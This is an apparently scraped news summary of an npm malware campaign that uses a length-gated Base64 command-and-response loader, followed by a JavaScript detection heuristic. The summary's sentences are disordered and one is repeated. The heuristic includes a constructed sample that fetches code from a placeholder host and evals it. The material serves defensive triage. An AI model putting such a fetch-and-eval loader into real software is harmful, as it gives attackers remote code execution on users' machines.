This carefully orchestrated attack serves as a stark reminder of the ever-evolving complexity of modern threat actors in the open-source ecosystem.
Researchers have discovered a new campaign aimed at the npm ecosystem that leverages a unique execution chain to deliver an unknown payload to targeted systems.
The command-and-response process returns a Base64-encoded string that is immediately executed, but only if that string is longer than 100 characters.
These packages target the Windows operating system and are identical with regard to their versioning, security researcher and journalist Ax Sharma said.
Also discovered by Sonatype is a package referred to as libiobe that’s capable of targeting both Windows and Linux operating systems.
Cybersecurity researchers have found a new ongoing campaign aimed at the npm community that leverages a unique execution chain to deliver an unknown payload to target systems.
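The Base64 length gate described above can be turned into a triage heuristic for package source files. This is an added example, not code from the researchers' report or from the packages themselves; the signal patterns and both sample snippets are constructed assumptions about how such a loader might be written in JavaScript.

```javascript
// Added example: heuristic static check, not code from the reported packages.
// The signal patterns are assumptions about how such a loader could be written.
const SIGNALS = {
  base64Decode: /\batob\s*\(|Buffer\.from\s*\(.{0,200}?['"]base64['"]/,
  dynamicExec: /\beval\s*\(|\bnew\s+Function\s*\(|\b(?:exec|execSync|spawn|spawnSync)\s*\(/,
  lengthGate: /\.length\s*>=?\s*(\d{2,5})\b/,
};

// Return one finding per signal per line: { signal, line, text, threshold? }.
function scanSource(source) {
  const findings = [];
  source.split(/\r?\n/).forEach((text, i) => {
    for (const [signal, re] of Object.entries(SIGNALS)) {
      const m = re.exec(text);
      if (!m) continue;
      const finding = { signal, line: i + 1, text: text.trim() };
      // Record the numeric threshold so an analyst can compare it with the
      // 100-character gate reported for this campaign.
      if (signal === 'lengthGate') finding.threshold = Number(m[1]);
      findings.push(finding);
    }
  });
  return findings;
}

// Flag a file only when all three signals co-occur: Base64 decoding,
// dynamic execution, and a minimum-length check on some value.
function isLengthGatedLoader(source) {
  const seen = new Set(scanSource(source).map((f) => f.signal));
  return Object.keys(SIGNALS).every((s) => seen.has(s));
}

// Constructed samples (not taken from any real package).
const SAMPLE_SUSPICIOUS = [
  "const body = await (await fetch('https://example.invalid/cmd')).text();",
  "if (body.length > 100) {",
  "  eval(Buffer.from(body, 'base64').toString('utf8'));",
  "}",
].join('\n');

const SAMPLE_BENIGN = [
  "const png = Buffer.from(iconB64, 'base64');",
  "if (png.length > 100) fs.writeFileSync('icon.png', png);",
].join('\n');

console.log(isLengthGatedLoader(SAMPLE_SUSPICIOUS), isLengthGatedLoader(SAMPLE_BENIGN));
```

A hit is a prompt for manual review rather than a verdict: legitimate code can combine these three operations, and obfuscated loaders can evade line-based patterns.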